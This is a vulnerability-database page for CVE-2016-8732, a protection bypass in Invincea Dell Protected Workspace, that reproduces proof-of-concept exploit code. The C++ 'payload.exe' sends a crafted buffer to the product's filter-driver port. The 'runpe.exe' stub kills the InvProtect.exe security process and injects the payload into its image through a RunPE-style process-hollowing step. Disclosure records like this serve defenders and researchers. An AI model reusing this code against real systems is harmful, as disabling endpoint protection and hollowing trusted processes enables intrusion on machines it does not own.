Vulners
Lucene search
Invincea Dell Protected Workspace Protection Bypass(CVE-2016-8732)
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2016-8732 | 8 Jul 201705:20 | – | circl |
 | CVE-2016-8732 | 24 Apr 201819:00 | – | cve |
 | CVE-2016-8732 | 24 Apr 201819:00 | – | cvelist |
 | EUVD-2016-9571 | 7 Oct 202500:30 | – | euvd |
 | CVE-2016-8732 | 24 Apr 201819:29 | – | nvd |
 | CVE-2016-8732 | 24 Apr 201819:29 | – | osv |
 | Design/Logic Flaw | 24 Apr 201819:29 | – | prion |
 | PT-2018-5053 · Dell · Invincea Dell Protected Workspace | 24 Apr 201800:00 | – | ptsecurity |
 | Invincea Dell Protected Workspace Protection Bypass | 30 Jun 201700:00 | – | talos |
 | Vulnerability Spotlight: Dell Precision Optimizer and Invincea Vulnerabilities | 30 Jun 201711:05 | – | talosblog |
10
--------------------------------------- payload.exe --------------------------------------------
#include "stdafx.h"
#include "Win32Project1.h"
#include <Windows.h>
#include <Fltuser.h>
#pragma comment(lib,"FltLib")
#include <fstream>
using namespace std;
#define _CRT_SECURE_NO_WARNINGS
void LogMessage(char* pszFormat, ...) {
static char s_acBuf[2048]; // this here is a caveat!
va_list args;
va_start(args, pszFormat);
vsprintf(s_acBuf, pszFormat, args);
OutputDebugStringA(s_acBuf);
va_end(args);
}
PBYTE readFile(LPWSTR fileName, PDWORD size)
{
PBYTE buffer;
ifstream file(fileName, ios::binary);
if (!file.is_open())
{
printf("Could no open file\n");
exit(0);
}
file.seekg(0, file.end);
*size = file.tellg();
file.seekg(0, file.beg);
buffer = new BYTE[*size];
file.read((char*)buffer, *size);
file.close();
return buffer;
}
void dumpFile(PBYTE buff,DWORD buffSize)
{
ofstream file("C:\\tmp\\outbuff.bin");
file.write((char*)buff,buffSize);
file.close();
}
void sendMessage()
{
HANDLE portHandle;
HRESULT result;
DWORD inBufferLen;
PBYTE inBuffer;
const DWORD outBufferLen = 0x1000;
BYTE outBuffer[0x1000] = { 0 };
DWORD returned;
LPCWSTR portName = L"\\InvProtectDrvPort";
result = FilterConnectCommunicationPort(portName, 0, 0, 0, 0, &portHandle);
if (IS_ERROR(result))
{
LogMessage("[-]Problem with connection : 0x%x\n", result);
return;
}
LogMessage("[+]Connection set. Ready for actions\n");
inBuffer = readFile(L"C:\\tmp\\package.bin", &inBufferLen);
LogMessage("inBuffer = 0x%x size : 0x%x\n", inBuffer, inBufferLen);
result = FilterSendMessage(portHandle, inBuffer, inBufferLen, outBuffer, outBufferLen, &returned);
if (IS_ERROR(result))
{
LogMessage("[-]FilterSend went wrong : 0x%x\n", result);
return;
}
LogMessage("[+]Outbuff dumped with size : 0x%x\n",returned);
dumpFile(outBuffer, returned);
LogMessage("[+]Message Sent\n");
}
int APIENTRY _tWinMain(_In_ HINSTANCE hInstance,
_In_opt_ HINSTANCE hPrevInstance,
_In_ LPTSTR lpCmdLine,
_In_ int nCmdShow)
{
sendMessage();
return 0;
}
--------------------------------------- payload.exe --------------------------------------------
------------------------------------------ runpe.exe ---------------------------------------------
int _tmain(int argc, _TCHAR* argv[])
LPWSTR src = L"C:\\Program Files\\Invincea\\Enterprise\\InvProtect.exe";
LPWSTR payload = L"Z:\\tmp\\payload.exe";
killProcess("InvProtect.exe");
runPE(src, readFile(payload));
return 0;
------------------------------------------ runpe.exe ---------------------------------------------
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Sep 2017 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.0003